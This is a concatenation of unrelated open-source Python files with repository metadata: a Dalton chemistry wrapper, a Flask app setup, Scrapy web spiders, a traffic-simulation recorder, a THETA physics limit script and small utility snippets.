# -*- coding: utf-8 -*- #The MIT License (MIT) # #Copyright (c) 2014 Lukasz Mentel # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: # #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. import os from collections import Counter from subprocess import Popen, call from .calculator import Calculator, InputTemplate, parse_objective from ..basisset import get_l class Dalton(Calculator): 'Wrapper for running Dalton program' def __init__(self, name='Dalton', **kwargs): self.name = name super(Dalton, self).__init__(**kwargs) self.daltonpath = os.path.dirname(self.executable) def parse(self, fname, objective, regularexp=None): ''' Parse a value from the output file ``fname`` based on the ``objective``. If the value of the ``objective`` is ``regexp`` then the ``regularexp`` will be used to parse the file. 
''' regexps = { 'hf total energy': r'^@\s+Final HF energy:\s*(\-?\d+\.\d+)', 'cisd total energy': r'\d+\s*\d+\s*(\-?\d+\.\d+).*converged', 'accomplished': r'End of Wave Function Section', } if objective == 'regexp': if regularexp is None: raise ValueError("<regularexp> needs to be specified for objective='regexp'") toparse = regularexp else: toparse = regexps.get(objective, None) if toparse is None: raise ValueError("Specified objective: '{0:s}' not supported".format(objective)) return parse_objective(fname, toparse) def run(self, fname): ''' Run a single job Args: fname : dict A dictionary with keys ``mol`` and ``dal`` and their respective file name strings as values Returns: out : str Name of the dalton output file ''' dalbase = os.path.splitext(fname['dal'])[0] molbase = os.path.splitext(fname['mol'])[0] command = [self.executable] + self.runopts + [dalbase, molbase] call(command) return dalbase + '_' + molbase + '.out' def run_multiple(self, fnames): ''' Spawn two single jobs as paralell processes ''' procs = [] outputs = [] for fname in fnames: dalbase = os.path.splitext(fname['dal'])[0] molbase = os.path.splitext(fname['mol'])[0] outputs.append(dalbase + '_' + molbase + '.out') command = [self.executable] + self.runopts + [dalbase, molbase] process = Popen(command) procs.append(process) for proc in procs: proc.wait() return outputs def write_input(self, fname, template, basis, mol, core): ''' Write dalton input files: ``fname.dal`` and ``system.mol`` Args: fname : str Name of the input file ``.dal`` template : dict Dictionary with templates for the ``dal`` and ``mol`` with those strings as keys and actual templates as values basis : dict An instance of :py:class:`BasisSet <chemtools.basisset.BasisSet>` class or a dictionary of :py:class:`BasisSet <chemtools.basisset.BasisSet>` objects with element symbols as keys mol : :py:class:`chemtools.molecule.Molecule` Molecule object with the system geometry core : str Core definition ''' # Dalton uses atomic units for 
xyz coordinats by default daltemplate = template['dal'] moltemplate = template['mol'] # loop over different elements (not atoms) atomtypes = Counter([a.symbol for a in mol.atoms]) out = '' for symbol, count in atomtypes.items(): atoms = [a for a in mol.atoms if a.symbol == symbol] atombasis = basis[symbol] atombasis.sort() # get max angular momentum + 1 and construct block string maxb = max([get_l(s) for s in atombasis.functions.keys()]) + 1 block = str(maxb) + ' 1' * maxb out += 'Atoms={0:d} Charge={1:.1f} Block={2:s}\n'.format(count, float(atoms[0].atomic_number), block) for i, atom in enumerate(atoms, start=1): out += '{0:4s} {1:15.8f} {2:15.8f} {3:15.8f}\n'.format(atom.symbol+str(i), atom.xyz[0], atom.xyz[1], atom.xyz[2]) out += atombasis.to_dalton() molsubs = {'basis' : out} moltemp = InputTemplate(moltemplate) dalsubs = {'core' : core} daltemp = InputTemplate(daltemplate) with open(fname['mol'], 'w') as fmol: fmol.write(moltemp.substitute(molsubs)) with open(fname['dal'], 'w') as fdal: fdal.write(daltemp.substitute(dalsubs)) def __repr__(self): return "\n".join(["<Dalton(", "\tname={},".format(self.name), "\tdaltonpath={},".format(self.daltonpath), "\texecutable={},".format(self.executable), "\tscratch={},".format(self.scratch), "\trunopts={},".format(str(self.runopts)), ")>\n"])
[ "lmmentel@gmail.com" ]
lmmentel@gmail.com
9a0a73a49aa62ab13967f5685b520d1fdb27dd8c
50bc7a7bc9fc742e1d5a992c785b45c9129172ee
/app/__init__.py
02b0e68b481784669fa7d7892f5de93758728073
[]
no_license
spark0119/silvi
8bc1da68dcb18bd4907954ea02a16c840a149d16
57397bbb5232fb07e50ba74a5df7debd922d347d
refs/heads/master
2022-12-10T13:59:56.832818
2019-11-20T14:31:28
2019-11-20T14:31:28
212,820,403
0
1
null
2022-12-08T06:54:47
2019-10-04T13:24:06
Python
UTF-8
Python
false
false
1,597
py
from flask import Flask from config import Config from flask_sqlalchemy import SQLAlchemy from flask_migrate import Migrate from flask_login import LoginManager import logging from logging.handlers import SMTPHandler, RotatingFileHandler import os app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) migrate = Migrate(app, db) login = LoginManager(app) login.login_view = 'login' from app import routes, models, errors if not app.debug: if app.config['MAIL_SERVER']: auth = None if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']: auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']) secure = None if app.config['MAIL_USE_TLS']: secure = () mail_handler = SMTPHandler( mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']), fromaddr='no-reply@' + app.config['MAIL_SERVER'], toaddrs=app.config['ADMINS'], subject='Silvi Failure', credentials=auth, secure=secure) mail_handler.setLevel(logging.ERROR) app.logger.addHandler(mail_handler) if not os.path.exists('logs'): os.mkdir('logs') file_handler = RotatingFileHandler('logs/silvi.log', maxBytes=10240, backupCount=10) file_handler.setFormatter(logging.Formatter( '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) app.logger.setLevel(logging.INFO) app.logger.info('Silvi startup')
[ "sean@groupraise.com" ]
sean@groupraise.com
2504fde740ea6ec4311efc8b5ea73256cae6680b
0961b605531fa73cb88640b5978572217bdb6554
/combinationSum.py
178da555738c081ee937891c539841ec56526b69
[]
no_license
LYoung-Hub/Algorithm-Data-Structure
e01d8b72c4026d9d4b9788016ca54c4e359e80ba
e42ec45d98f990d446bbf4f1a568b70855af5380
refs/heads/master
2020-07-13T17:17:42.897244
2019-11-11T06:15:59
2019-11-11T06:15:59
205,121,630
0
0
null
null
null
null
UTF-8
Python
false
false
786
py
class Solution(object): ans = [] def combinationSum(self, candidates, target): """ :type candidates: List[int] :type target: int :rtype: List[List[int]] """ length = len(candidates) if length == 0: return [] self.ans = [] comb = [] self.backTracking(candidates, target, comb) return self.ans def backTracking(self, nums, target, comb): if target == 0: self.ans.append(comb) return if target < 0: return for i in range(0, len(nums)): self.backTracking(nums[i:], target - nums[i], comb + [nums[i]]) if __name__ == '__main__': solu = Solution() print solu.combinationSum([2, 3, 6, 7], 7)
[ "yangliu2@caltech.edu" ]
yangliu2@caltech.edu
e3ba9166ff9f094c8ede9e3c3756bb8117241c50
3cae667175b2d6aac6d7f3d8189e9a02c38ea1cf
/AOJ/ITP1/python/ITP1_1_D_Watch.py
c0a07556a3ffec6f81a94127a026e1a802c5a520
[]
no_license
kokorinosoba/contests
3ee14acf729eda872ebec9ec7fe3431f50ae23c2
6e0dcd7c8ee086650d89fc65616981361b9b20b9
refs/heads/master
2022-08-04T13:45:29.722075
2022-07-24T08:50:11
2022-07-24T08:50:11
149,092,111
0
0
null
null
null
null
UTF-8
Python
false
false
130
py
s=int(input()) print(s//3600,s//60%60,s%60,sep=':') """ S=int(input()) m,s=divmod(S,60) h,m=divmod(m,60) print(h,m,s,sep=":") """
[ "34607448+kokorinosoba@users.noreply.github.com" ]
34607448+kokorinosoba@users.noreply.github.com
092ad3e710de8763f9af7ca100f888acc1cc9d24
5303252c8d570844d71fe374d6c78eb6f14aebb6
/iosgames/spiders/iosgamesbot.py
48d4b32f85b44053b2b71c180e4a2ac2db15c308
[]
no_license
vin-say/web-scraping
7cff35f73980cbce49a5b5d70cb35b04b350c333
be3b529d485e1330a8189692f1bf9720ff23b4ec
refs/heads/master
2020-08-04T15:39:13.923213
2020-01-04T03:40:26
2020-01-04T03:40:26
212,187,615
0
0
null
null
null
null
UTF-8
Python
false
false
2,707
py
# -*- coding: utf-8 -*- import scrapy from ..items import GameItemLoader, Game class Iosgamesbot(scrapy.Spider): name = 'iosgamesbot' allowed_domains = ['apps.apple.com/us/app/simcity-buildit/id913292932'] start_urls = ['http://apps.apple.com/us/app/simcity-buildit/id913292932/'] def parse(self, response): il = GameItemLoader(item=Game(), response=response) # basic information il.add_xpath('title', '//h1[@class="product-header__title app-header__title"]/text()') il.add_xpath('subtitle', '//h2[@class="product-header__subtitle app-header__subtitle"]/text()') il.add_xpath('author', '//h2[@class="product-header__identity app-header__identity"]/a/text()') il.add_xpath('price', '//li[@class="inline-list__item inline-list__item--bulleted app-header__list__item--price"]/text()') il.add_xpath('iap', '//li[@class="inline-list__item inline-list__item--bulleted app-header__list__item--in-app-purchase"]/text()') il.add_xpath('age', '//span[@class="badge badge--product-title"]/text()') il.add_xpath('desc', '//div[@class="section__description"]//p/text()') # game popularity and reception il.add_xpath('list_rank', '//li[@class="inline-list__item"]/text()') il.add_xpath('score', '//span[@class="we-customer-ratings__averages__display"]/text()') il.add_xpath('nrating', '//div[@class="we-customer-ratings__count small-hide medium-show"]/text()') il.add_xpath('stars', '//div[@class="we-star-bar-graph__row"]/div/div/@style') # other details il.add_xpath('editor', '//div[@class="we-editor-notes lockup ember-view"]/div/h3/text()') il.add_xpath('seller', '//dl[@class="information-list information-list--app medium-columns"]/div[1]/dd[@class="information-list__item__definition l-column medium-9 large-6"]/text()') il.add_xpath('size', '//dl[@class="information-list information-list--app medium-columns"]/div[2]/dd[@class="information-list__item__definition l-column medium-9 large-6"]/text()') il.add_xpath('category', '//dl[@class="information-list information-list--app 
medium-columns"]/div[3]/dd/a/text()') il.add_xpath('compat', '//dl[@class="information-list information-list--app medium-columns"]//p/text()') il.add_xpath('lang', '//dl[@class="information-list information-list--app medium-columns"]//p/text()') il.add_xpath('age_copy', '//dl[@class="information-list information-list--app medium-columns"]/div//dd/text()') il.add_xpath('support', '//div[@class="supports-list__item__copy"]/h3[@dir="ltr"]/text()') return il.load_item()
[ "vincent.sayseng@gmail.com" ]
vincent.sayseng@gmail.com
a78e5ff716f3fa6d77eaee943d3c3d68e344c53d
3b6bf30cd6ef7f770faa84852515af3255e217af
/douban_spider/douban/spiders/doubancomics.py
fc1a15fc2e58abb8096312ed464f891339bdef4e
[]
no_license
lemonround1995/Douban_Spider
ae8e6a9f5e907e0bcbfc026e5f0acfe1325647eb
162adc5af31e425a3dd091fb255b758c63c62cb1
refs/heads/master
2020-04-13T01:07:07.304265
2018-12-23T05:35:46
2018-12-23T05:35:46
162,864,760
0
0
null
null
null
null
UTF-8
Python
false
false
1,274
py
# -*- coding: utf-8 -*- import scrapy from scrapy.http import Request from ..items import DoubanItem class DoubancomicsSpider(scrapy.Spider): name = "doubancomics" allowed_domains = ["douban.com"] start_urls = ['https://book.douban.com/tag/%E6%BC%AB%E7%94%BB?start=0&type=T'] def parse(self, response): for sel in response.xpath('//*[@id="subject_list"]/ul/li/div[2]'): item = DoubanItem() item['title'] = sel.xpath('h2/a/text()').extract_first() item['link'] = sel.xpath('h2/a/@href').extract_first() item['info'] = sel.xpath('div[1]/text()').extract_first() item['desc'] = sel.xpath('p/text()').extract_first() yield item # 爬行多页 next_page_1 = response.xpath('//*[@id="subject_list"]/div[2]/span[4]/a/@href').extract_first() # 因为“后页”的格式有变 next_page_2 = response.xpath('//*[@id="subject_list"]/div[2]/span[5]/a/@href').extract_first() if next_page_1: url = u'https://book.douban.com' + next_page_1 yield Request(url, callback=self.parse) if next_page_2: url = u'https://book.douban.com' + next_page_2 yield Request(url, callback=self.parse)
[ "noreply@github.com" ]
noreply@github.com
c1abf839a8e2b0961c4bf36e6da588e937b240ab
f9ef267bf703783d95b188ff29fd2a5fc686c926
/Basik_Tutorial/__basik__/record.py
06b3d1314b26cabd76d0744d56548b70745bfe63
[]
no_license
dylansolms/TrafficSimulator
34e2643ac74a235278c7aec1103fe0c3c46b0a08
6ef19e76aad6ff4470d864db9b35c734ded36660
refs/heads/master
2022-11-26T15:45:13.832385
2020-07-17T12:54:03
2020-07-17T12:54:03
280,400,653
0
0
null
null
null
null
UTF-8
Python
false
false
15,549
py
import numpy as np import pandas as pd import matplotlib.pyplot as plt from .node import Node from .source import Source from .VehicleObject.vehicle import Vehicle import warnings from .utils import unique_legend try: import cPickle as pickle except ImportError or ModuleNotFoundError: import pickle #------------------------------------------------------------------------------ class Record(object): '''Records the time-stamps of vehicle arrival times. Attributes ----------- time_stamps: list A list of the times that vehicles passed the node with a Record object. source_IDs: list Each source that generates vehicle arrivals has an ID. This way we can determine which source a recorded vehicle may have come from. colors: list Just as each source has an ID associated with it, so does it have a unique color as well. This helps with the stem_plot method. data: Pandas DataFrame If we are recording either time-stamps or inter-arrival times to a csv file then we produces this DataFrame as to make use of the Pandas.DataFrame.to_csv method. current_time: float The last time the record object was activate i.e. it recorded a vehicle. vehicles: list A list of the actual vehicles that passed will be kept in addition to the time-stamps. This means that the vehicles can be probed for additional information. ''' is_record = True RECORD = True color_list = ['royalblue','orchid','coral','cyan','palegreen','firebrick', 'orange','olive','thistle','grey','tomato','teal','maroon', 'plum','wheat','turquoise'] #-------------------------------------------------------------------------- def __init__(self,node:'__basik__.node.Node',axes=None): ''' Parameters ---------- node: __basik__.node.Node This is the node that will record vehicles. axes: matplotlib.axes._subplots.AxesSubplot The stem_plot method makes use of this. If is left as None, then a new axes object will be produced. This object can be accessed as a class attribute. 
Raises: ------- AssertionError If the node parameter is not an instance of __basik__.node.Node ''' assert isinstance(node,Node) self.time_stamps = [] self.source_IDs = [] self.colors = [] self.data = None self.axes = axes self.vehicles = [] self.__setup(node) self.current_time = 0 #-------------------------------------------------------------------------- def place_record(self,vehicle): '''Record the actual vehicle. The vehicle object will be appended to the vehicles list, its arrival time will be appended to the time_stamps and its source ID and color will be recorded as well. The current_time of the record object will be updated to match that of the current vehicle being recorded. Parameters: ----------- vehicle: __basik__.VehicleObject.vehicle.Vehicle A vehicle being recorded. Raises: ------- AssertionError If the node parameter is not an instance of __basik__.VehicleObject.vehicle.Vehicle Returns: ------- None ''' assert isinstance(vehicle,Vehicle) self.vehicles.append(vehicle) self.current_time = vehicle.time self.time_stamps.append(vehicle.time) self.source_IDs.append(vehicle.source_ID) self.colors.append(self.color_list[vehicle.source_ID]) return None #-------------------------------------------------------------------------- def process_records(self,start_time:'float or None'=None): '''Processes time-stamp into intervals. Parameters: ----------- start_time: None or float or int If set to None then the first recorded time-stamp will serve as as the starting point for producing intervals/vehicle inter-arrival times. Hence N time-stamps give rise to (N-1) intervals. If star_time is provided then N intervals are produced. Raises: ------- AssertionError: If start_time is not None then it must be smnaller than the first recorded time-stamp. 
Returns: ------- None ''' if not bool(self.vehicles): raise Exception('No vehicles were recorded.') # for vehicle in self.vehicles: # self.place_record(vehicle) if start_time is None: x = np.array(self.time_stamps) else: assert start_time < self.time_stamps[0] x = np.array([start_time] + self.time_stamps) self.intervals = x[1:] - x[:-1] return None #-------------------------------------------------------------------------- def clear(self,current_time:float=0): '''Clears all recordings and resets current_time. Parameters: ----------- current_time: float or int Returns: ------- None ''' self.time_stamps = [] self.source_IDs = [] self.colors = [] self.current_time = current_time self.vehicles = [] self.intervals = None self.node.record_object = self self.node.record = True if self.axes is not None: self.axes.cla() return None #-------------------------------------------------------------------------- def __setup(self,node): node.record_object = self node.record = True if node.display_axes is not None: node.icon_image = Node.camera node.display_icon() self.node = node return None #-------------------------------------------------------------------------- def _read(self,file_name): self.data = pd.read_csv(file_name) return None #-------------------------------------------------------------------------- def _write(self,file_name,intervals=True): if intervals: x = np.array([0] + self.time_stamps) x = x[1:] - x[:-1] self.data = pd.DataFrame(data=x, columns=['intervals']) else: self.data = pd.DataFrame(data=self.time_stamps, columns=['time-stamps']) if file_name[-4:] != '.csv': file_name += '.csv' warnings.warn('.csv extension was added.') self.data.to_csv(file_name,index=False) return None #-------------------------------------------------------------------------- def _save_as_csv(self,file_name,intervals=True): self._write(file_name,intervals) return None #-------------------------------------------------------------------------- def 
_save_as_pickle(self,file_name:'name.pkl'): if file_name[-4:] != '.pkl': file_name += '.pkl' warnings.warn('.pkl extentsion was added.') with open(file_name,'wb') as file: pickle.dump(self, # it pickles the actual Source class instance. file, protocol=4) # allows for large data. return None #-------------------------------------------------------------------------- def save(self,file_name:str, method:'\'csv\', \'pickle\' or \'pkl\''='csv', intervals:bool=True, start_time:'float or None'=None): '''Saves recorded information to a file of choice. Parameters: ----------- file_name: str This should be a valid path name. method: 'csv', 'pickle' or 'pkl' If the csv method is chosen then only the time-stamps or intervals/ vehicle inter-arrival times will be recorded. Choose interval as True if vehicle inter-arrival times are required. If the pickle method is chosen then the enitre object with all its data will be serialised. intervals: bool If set to True then inter-arrival times will saved as a csv with the header 'intervals'. Otherwise, time-stamps are saved under the header 'time-stamps'. start_time: None or float or int If set to None then the first recorded time-stamp will serve as as the starting point for producing intervals/vehicle inter-arrival times. Hence N time-stamps give rise to (N-1) intervals. If star_time is provided then N intervals are produced. Raises: ------- ValueError If an invalid method is given. See method under Parameters. Notes: ------ If a valid method is chosen but the file_name does not contain the correct extension then the extension will be added. A warning will be produced via the warnings module to notify the user that this has been performed. 
Returns: -------- None ''' # Intervals = True is only applicable to the csv file if method == 'csv': self._save_as_csv(file_name,intervals) elif method == 'pickle' or method == 'pkl': self._save_as_pickle(file_name) else: raise ValueError('method must be either \'csv\', \'pickle\' or \'pkl\' ') return None #-------------------------------------------------------------------------- def to_source(self,vehicle_velocity:'float m/s', target_node:'__basik__.node.Node', vehicle_color:str='random', record_movement:bool=False): '''Converts a __basik__.source.Record object to a __basik__.source.Source object. The record object and all its recorded time-stamps are converted to a source object. This means that one can convert a recorded section of a simulation and use it as a source in a separate simulation. Hence, a larger simualtion can be broken down into smaller ones. Note: this method does not save the new source object. A pickled (serialised) record object can always be converted to a source object. Parameters: ----------- vehicle_velocity: float A value in meters per second. All vehicle will move at this velocity on average. target_node: __basik__.node.Node The node at which new vehicles will arrive/appear/be introduced to interact in the simulation. vehicle_color: str This is the color setting of the vehicle. Note that if the color has been set to 'random' then the randomly selected color can be accessed via Vehicle.vehicle_display.color record_movement: bool A vehicle can be produced by the source with the setting/instructions that it record its movement across the simulation. A recorded vehicle can then be probed for this information from the vehicles list. Raises: ------- AssetionError: If the target_node is not an instance of __basik__.node.Node Returns: -------- None Notes: ------ While this method converts a record object to a source object, it does not create a saved source object. This is because any saved record object can be converted to a source object. 
''' assert isinstance(target_node,Node) rate_schedule = {0:self} source = Source(vehicle_velocity=vehicle_velocity, target_node=target_node, rate_schedule=rate_schedule, vehicle_color=vehicle_color, record_movement=record_movement) # NOTE: look at source.py # one will notice that Source.schedule_arrivals() can handle # the rate_schedule given. return source #-------------------------------------------------------------------------- def stem_plot(self,start_time:'float or None'=None, legend:bool=True): '''Creates a stem-plot of the inter-arrival times (intervals). Parameters: ----------- start_time: None or float or int If set to None then the first recorded time-stamp will serve as as the starting point for producing intervals/vehicle inter-arrival times. Hence N time-stamps give rise to (N-1) intervals. If star_time is provided then N intervals are produced. legend: bool Creates a legend to indicte which source a recorded vehicle originates from. Returns: -------- None ''' if self.axes is None: self.figure,self.axes = plt.subplots(1,1) if start_time is None: X = np.array(self.time_stamps) else: X = np.array([start_time] + self.time_stamps) X = X[1:] - X[:-1] seen_ids = [] for idx,x in enumerate(X): self.axes.vlines(idx,0,x,colors=self.colors[idx], alpha=0.5,linestyle='--') source_id = self.source_IDs[idx] if source_id in seen_ids: self.axes.scatter([idx],[x],color=self.colors[idx]) else: seen_ids.append(source_id) self.axes.scatter([idx],[x],color=self.colors[idx], label='Source (ID:{0})'.format(source_id)) if legend: # self.axes.legend(loc='best') self.legend = unique_legend(axes=self.axes, loc='best') self.axes.set_xlabel('$n^{th}$ arrival') self.axes.set_ylabel('inter-arrival times') self.axes.set_title('Inter-arrival time stem plot') # if hasattr(self, 'figure'): # self.figure.show() # else: # plt.show() return None #-------------------------------------------------------------------------- def __repr__(self): return 'Record ({0}) at {1}'.format(hex(id(self)), 
self.node) #--------------------------------------------------------------------------
[ "afrozoolander@gmail.com" ]
afrozoolander@gmail.com
33c45d1bea515ce8e7487f1aaae7632a3290ea23
7266cf77381267869aa39b6345666d148793f153
/THETA/run_0.8tZ_0.2bW_0.0tH.py
783200ff41e1e95fad152beac8cafdd97d339b2f
[]
no_license
justinrpilot/VLQAnalysis
8a0ff20f96be58d5613dc1eec308e43d0a931f96
99d6295ef985ebdd8a66820b024750b890ab4aff
refs/heads/master
2020-05-03T06:17:42.717548
2019-06-04T20:16:16
2019-06-04T20:16:16
178,469,791
0
0
null
null
null
null
UTF-8
Python
false
false
7,000
py
import json def allhadfilter(hname): #print hname names = hname.split("__") channel = names[0] process = names[1] #if ("tprime" not in process): # return hname keep = True if (("sig800" in channel) and ("tprime800" not in process)): keep = False if (("sig1000" in channel) and ("tprime1000" not in process)): keep = False if (("sig1200" in channel) and ("tprime1200" not in process)): keep = False if (("sig1400" in channel) and ("tprime1400" not in process)): keep = False if (("sig1600" in channel) and ("tprime1600" not in process)): keep = False if (("sig1800" in channel) and ("tprime1800" not in process)): keep = False if 'diboson' in process and 'SF' in hname: keep = False #print channel, process, keep if (not keep): hname = hname.replace("__", "DONOTUSE") #print hname return hname def build_model__ttbar_allhad(allhadfile, mcstat): print "Using All-Had File: ", allhadfile mod = build_model_from_rootfile(allhadfile, root_hname_to_convention=allhadfilter, include_mc_uncertainties=True) mod.fill_histogram_zerobins() mod.set_signal_processes("tprime*") sf_t = 0.02 sf_W = 0.02 sf_Z = 0.02 sf_H = 0.02 sf_b = 0.02 sf_q = 0.02 for chan in mod.get_observables(): print chan for p in mod.processes: if 'qcd' in p: continue tags = 0 mod.add_lognormal_uncertainty('lumi', 0.027, p, chan) #if '1W' in chan: # tags += 1 # mod.add_lognormal_uncertainty('W_SF', sf_W, p, chan) #if '2W' in chan: # tags += 2 # mod.add_lognormal_uncertainty('W_SF', 2*sf_W, p, chan) #if '3W' in chan: # tags += 3 # mod.add_lognormal_uncertainty('W_SF', 3*sf_W, p, chan) #if '4W' in chan: # tags += 4 # mod.add_lognormal_uncertainty('W_SF', 4*sf_W, p, chan) #if '1t' in chan: # tags += 1 # mod.add_lognormal_uncertainty('t_SF', sf_t, p, chan) #if '2t' in chan: # tags += 2 # mod.add_lognormal_uncertainty('t_SF', 2*sf_t, p, chan) #if '3t' in chan: # tags += 3 # mod.add_lognormal_uncertainty('t_SF', 3*sf_t, p, chan) #if '4t' in chan: # tags += 4 # mod.add_lognormal_uncertainty('t_SF', 4*sf_t, p, chan) #if '1Z' in 
chan: # tags += 1 # mod.add_lognormal_uncertainty('Z_SF', sf_Z, p, chan) #if '2Z' in chan: # tags += 2 # mod.add_lognormal_uncertainty('Z_SF', 2*sf_Z, p, chan) #if '3Z' in chan: # tags += 3 # mod.add_lognormal_uncertainty('Z_SF', 3*sf_Z, p, chan) #if '4Z' in chan: # tags += 4 # mod.add_lognormal_uncertainty('Z_SF', 4*sf_Z, p, chan) #if '1H' in chan: # tags += 1 # mod.add_lognormal_uncertainty('H_SF', sf_H, p, chan) #if '2H' in chan: # tags += 2 # mod.add_lognormal_uncertainty('H_SF', 2*sf_H, p, chan) #if '3H' in chan: # tags += 3 # mod.add_lognormal_uncertainty('H_SF', 3*sf_H, p, chan) #if '4H' in chan: # tags += 4 # mod.add_lognormal_uncertainty('H_SF', 4*sf_H, p, chan) #if '1b' in chan: # tags += 1 # mod.add_lognormal_uncertainty('b_SF', sf_b, p, chan) #if '2b' in chan: # tags += 2 # mod.add_lognormal_uncertainty('b_SF', 2*sf_b, p, chan) #if '3b' in chan: # tags += 3 # mod.add_lognormal_uncertainty('b_SF', 3*sf_b, p, chan) #if '4b' in chan: # tags += 4 # mod.add_lognormal_uncertainty('b_SF', 4*sf_b, p, chan) #mod.add_lognormal_uncertainty('q_SF', (4-tags)*sf_q, p, chan) #mod.add_lognormal_uncertainty('xsec_ttbar', 0.05, 'ttbar', chan) mod.add_lognormal_uncertainty('xsec_wjets', 0.10, 'wjets', chan) mod.add_lognormal_uncertainty('xsec_zjets', 0.10, 'zjets', chan) mod.add_lognormal_uncertainty('xsec_diboson', 0.50, 'diboson', chan) mod.add_lognormal_uncertainty('xsec_ttV', 0.50, 'ttV', chan) mod.add_lognormal_uncertainty('xsec_higgs', 0.50, 'higgs', chan) return mod infile = "templates/theta4jet_0.8tz_0.2bw_0.0th.root" model = build_model__ttbar_allhad(infile, True) #model_summary(model, create_plots=True, all_nominal_templates=False, shape_templates=True) opts = Options() options = Options() options.set('minimizer', 'strategy', 'robust') options.set('minimizer', 'minuit_tolerance_factor', '10000000') #runs = bayesian_quantiles(model, input='toys:0', n=1000, run_theta=False, hint_method='zero') #runs_data = bayesian_quantiles(model, input='data', n=10, 
run_theta=False, hint_method='zero') # results = bayesian_limits(model, input='toys:0', n=10, run_theta = True, **args) #print results #for sig in model.signal_process_groups: # print sig, runs[sig] # run = runs[sig] # run_data = runs_data[sig] # thisOptions = Options() # run.get_configfile(thisOptions) # run_data.get_configfile(thisOptions) expected, observed = bayesian_limits(model, 'all', n_toy = 500, run_theta = True) expected.write_txt("limitsJAN_0.8tz_0.2bw_0.0th.txt") observed.write_txt("obslimitsJAN_0.8tz_0.2bw_0.0th.txt") #parameter_values_nom = {} #for p in model.get_parameters([]): # parameter_values_nom['beta_signal'] = 1.0 # parameter_values_nom[p] = 0.0 #histos = evaluate_prediction(model, parameter_values_nom, include_signal = True) #out_histos_dict = dict() #for channel in histos: # out_histos_dict[channel] = dict() # for hist in histos[channel]: # out_histos_dict[channel].update( {hist : list(histos[channel][hist].get_values())} ) #with open('histos.json', 'w') as file: # file.write(json.dumps(out_histos_dict)) #discovery(model, use_data=False, maxit=50, n = 100, n_expected = 100 ) # pVals = pvalue(model, input='toys:1.0', n = 50, options=options, bkgtoys_n = 100, bkgtoys_n_runs = 3) # print pVal # options = Options() # options.set('minimizer', 'strategy', 'robust') # options.set('minimizer', 'minuit_tolerance_factor', '10000000') # parVals = mle(model, input='toys:0', n=10, options = options) # print parVals # parameter_values = {} # parameter_values_nom = {} # for p in model.get_parameters([]): # parameter_values[p] = parVals['zpn3000'][p][0][0] # parameter_values_nom[p] = 0.0#parVals['zpn3000'][p][0][0] # histos = evaluate_prediction(model, parameter_values, include_signal = False) # write_histograms_to_rootfile(histos, 'histos-mle.root') # histos = evaluate_prediction(model, parameter_values_nom, include_signal = False) # write_histograms_to_rootfile(histos, 'histos-nom.root') # exp.write_txt("limits_combo_test.txt") # 
obs.write_txt("limits_obs_combo_test.txt") # o_file = open('limits.txt', 'w') # for i in range(len(exp.x)): # o_file.write( '%.2f %.5f' % (exp.x[i], exp.y[i])) # o_file.write(' %.5f %.5f' % (exp.bands[1][1][i], exp.bands[1][0][i])) # o_file.write(' %.5f %.5f' % (exp.bands[0][1][i], exp.bands[0][0][i])) # o_file.write(' %.5f' % (obs.y[i] if obs else -1.)) # o_file.write('\n') # o_file.close()
[ "pilot@Justins-MacBook-Air-4.local" ]
pilot@Justins-MacBook-Air-4.local
c4116cf331ef22b2e9039e73422782228e1bf95c
e4f2374a50cfdc674ba8e97fa6616b2fb11f40d0
/function_store.py
6284927d14856e44faba396c172a1075b3202852
[]
no_license
flying-pi/functionPatching
9eabc7613dabc8537a8bc3386750014859ac29ff
b488b9ab9f43d6a2715dd24aec652bf582f0ffd3
refs/heads/master
2021-05-15T17:01:38.550572
2017-10-19T15:59:13
2017-10-19T15:59:13
107,568,028
0
0
null
null
null
null
UTF-8
Python
false
false
86
py
from peta_module import peta_function def adder(a): return peta_function(a, 10)
[ "yura.braiko@raccoongang.com" ]
yura.braiko@raccoongang.com
55e3891a2fa5e9360b2ff65099e45176087373ca
d8ec14c780f7536a099b6c4f03461ac546d54d6c
/helga_excuses.py
6f6e408b60364668e4888aac2a13ec87064d9e81
[]
no_license
alfredodeza/helga-excuses
bdcc0621a505fc9abd2cdc79c020bd7aa694c5a9
251c155affaf7d3412a65fe1cb572e6e565d8864
refs/heads/master
2021-01-10T19:11:16.352300
2013-12-10T23:48:43
2013-12-10T23:48:43
14,873,521
1
0
null
2013-12-10T23:48:44
2013-12-02T20:15:25
Python
UTF-8
Python
false
false
416
py
import requests from BeautifulSoup import BeautifulSoup from helga.plugins import command @command('excuses', aliases=['excuse'], help='Show something from developer excuses. Usage: helga (excuses|excuse)') def excuses(client, channel, nick, message, cmd, args): response = requests.get('http://developerexcuses.com/') return BeautifulSoup(response.text).find('a').text.encode('ascii', 'ignore')
[ "shaun.duncan@gmail.com" ]
shaun.duncan@gmail.com
fcf69ccc998f4adb76624b38832b6312065d0673
d1160216bfbeb13a0f8356d5fcf70a6588be0d2b
/server.py
3b1c24fb2388ddabcc729992f682dcea6bc679ac
[]
no_license
afabijan/hypflask
e32770d036385aec096c7567a48a551e3df45354
d4a292361a98b83f78ee579a32dada34abd18dc7
refs/heads/master
2021-01-10T14:56:18.854402
2015-06-05T13:50:30
2015-06-05T13:50:30
36,935,283
0
0
null
null
null
null
UTF-8
Python
false
false
645
py
